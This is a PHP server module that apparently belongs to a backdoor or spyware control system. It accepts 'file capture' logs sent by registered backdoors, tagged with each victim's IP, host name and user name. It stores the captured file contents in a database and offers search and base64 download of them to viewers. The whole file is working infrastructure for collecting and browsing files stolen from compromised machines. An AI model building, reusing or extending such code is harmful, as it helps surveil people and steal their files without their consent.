<?php

//////////
///
///   log_filecap.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['log_filecap.add']           ['function'] = 'log_filecap_add';
//   $dm['log_filecap.add']          ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                               $xmlrpcString,     // $backdoor
//                                                               $xmlrpcString,     // $remoteip
//                                                               $xmlrpcString,     // $remotehost
//                                                               $xmlrpcString,     // $remoteuser
//                                                               $xmlrpcArray));    // $logarray
}

if($al & AL_VIEW) {
   $dm['log_filecap.getdetail']     ['function'] = 'log_filecap_getdetail';
//   $dm['log_filecap.getdetail']    ['signature'] = array(array($xmlrpcArray,      // return value
//                                                               $xmlrpcArray,      // $selarray
//                                                               $xmlrpcArray,      // $backdoorarray
//                                                               $xmlrpcArray,      // $remoteiparray
//                                                               $xmlrpcArray,      // $remotehostarray
//                                                               $xmlrpcArray,      // $remoteuserarray
//                                                               $xmlrpcArray,      // $tagarray
//                                                               $xmlrpcArray,      // $acquiredarray
//                                                               $xmlrpcString,     // $searchstring
//                                                               $xmlrpcInt));      // $limit
}

if($al & AL_VIEW) {
   $dm['log_filecap.getcontent']    ['function'] = 'log_filecap_getcontent';
//   $dm['log_filecap.getcontent']   ['signature'] = array(array($xmlrpcArray,      // return value
//                                                               $xmlrpcArray));    // $logarray
}



/***************\
*   FUNCTIONS   *
\***************/

function log_filecap_add($backdoor, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= desc
   // varchar2  <= [md5(content)]
   // varchar3  <= -
   // int1      <= [sizeof(content)]
   // int2      <= -
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= content

   foreach($logarray as &$log) {
      if(isset($log['contentfile']) && isset($_SESSION['upload'][$log['contentfile']])) {
         clearstatcache();
         $log['_content'] = file_get_contents(sys_get_temp_dir().'/'.$log['contentfile']);
         $log['size'] = filesize(sys_get_temp_dir().'/'.$log['contentfile']);
         unlink(sys_get_temp_dir().'/'.$log['contentfile']);
         unset($_SESSION['upload'][$log['contentfile']]);
         $log['md5'] = md5($log['_content']);
      } else {
         $log['content'] = $log['content']->scalar;
         $log['size'] = strlen($log['content']);
         $log['md5'] = md5($log['content']);
      }
   }
   unset($log);

   $ret = db_escape(array(&$backdoor,
                          &$remoteip,
                          &$remotehost,
                          &$remoteuser,
                          &$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }

   $backdoor_id = $ret[0]->backdoor_id;

   foreach($logarray as $log) {
      $sql  = "SELECT `log_id` ";
      $sql .= "FROM `log` ";
      $sql .= "WHERE (`backdoor_id` = '$backdoor_id') AND ";
      $sql .=       "(`type` = 'FILECAP') AND ";
      $sql .=       "(`remotehost` = '$remotehost') AND ";
      $sql .=       "(`remoteuser` = '$remoteuser') AND ";
      $sql .=       "(`varchar1` = '".$log['desc']."') AND ";
      $sql .=       "(`varchar2` = '".$log['md5']."')";

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      } else if($ret === false) {
         if(isset($log['_content'])) {
            $ret = db_escape_file($log['_content']);
            if(is_object($ret)) {
               return $ret;
            }
            $log['content'] = &$log['_content'];
         }

         $sql  = "INSERT INTO `log` (`backdoor_id`, ";
         $sql .=                    "`type`, ";
         $sql .=                    "`remoteip`, ";
         $sql .=                    "`remotehost`, ";
         $sql .=                    "`remoteuser`, ";
         $sql .=                    "`received`, ";
         $sql .=                    "`acquired`, ";
         $sql .=                    "`varchar1`, ";
         $sql .=                    "`varchar2`, ";
         $sql .=                    "`int1`, ";
         $sql .=                    "`longblob1`) ";
         $sql .= "VALUES ('$backdoor_id', ";
         $sql .=         "'FILECAP', ";
         $sql .=         "'$remoteip', ";
         $sql .=         "'$remotehost', ";
         $sql .=         "'$remoteuser', ";
         $sql .=         "UTC_TIMESTAMP(), ";
         $sql .=         "'".str_replace(':', '', $log['acquired']->scalar)."', ";
         $sql .=         "'".$log['desc']."', ";
         $sql .=         "'".$log['md5']."', ";
         $sql .=         "'".$log['size']."', ";
         $sql .=         "'";
         $sql .=           $log['content'];
         $sql .=         "')";
      } else {
         $sql  = "UPDATE `log` ";
         $sql .= "SET `received` = UTC_TIMESTAMP() ";
         $sql .= "WHERE `log_id` = '".$ret[0]->log_id."'";
      }

      $log = false;

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      }
   }

   return true;
}

function log_filecap_getdetail($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $limit = -1)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$limit));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `log_id` AS `log`, ";
   $sql .=        "`backdoor`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "DATE_FORMAT(`acquired`, '%Y%m%dT%T') AS `acquired`, ";
   $sql .=        "DATE_FORMAT(`received`, '%Y%m%dT%T') AS `received`, ";
   $sql .=        "`varchar1` AS `filename`, ";
   $sql .=        "LEAST(LENGTH(`longblob1`), 1073741825) AS `size`, ";
   $sql .=        "`tag` AS `priority`, ";
   $sql .=        "COUNT(`note_id`) AS `notecount` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "LEFT JOIN `note` USING (`log_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'FILECAP') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('varchar1') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= "GROUP BY `log_id`";
   if($limit >= 0) {
      $sql .= " ORDER BY `log_id` DESC";
      $sql .= " LIMIT $limit";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->log, 'integer');
      xmlrpc_set_type($r->acquired, 'datetime');
      xmlrpc_set_type($r->received, 'datetime');
      settype($r->size, 'integer');
      settype($r->priority, 'integer');
      settype($r->notecount, 'integer');
   }
   unset($r);

   return $ret;
}

function log_filecap_getcontent($logarray)
{
   $ret = db_escape(array(&$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $selarray = array();

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `log_id` AS `log`, ";
   $sql .=        "`longblob1` AS `content` ";
   $sql .= "FROM `log` ";
   $sql .= "WHERE (`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`log_id` IN ('".implode("', '", $logarray)."'))";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->log, 'integer');
      xmlrpc_set_type($r->content, 'base64');
   }
   unset($r);

   return $ret;
}

?>
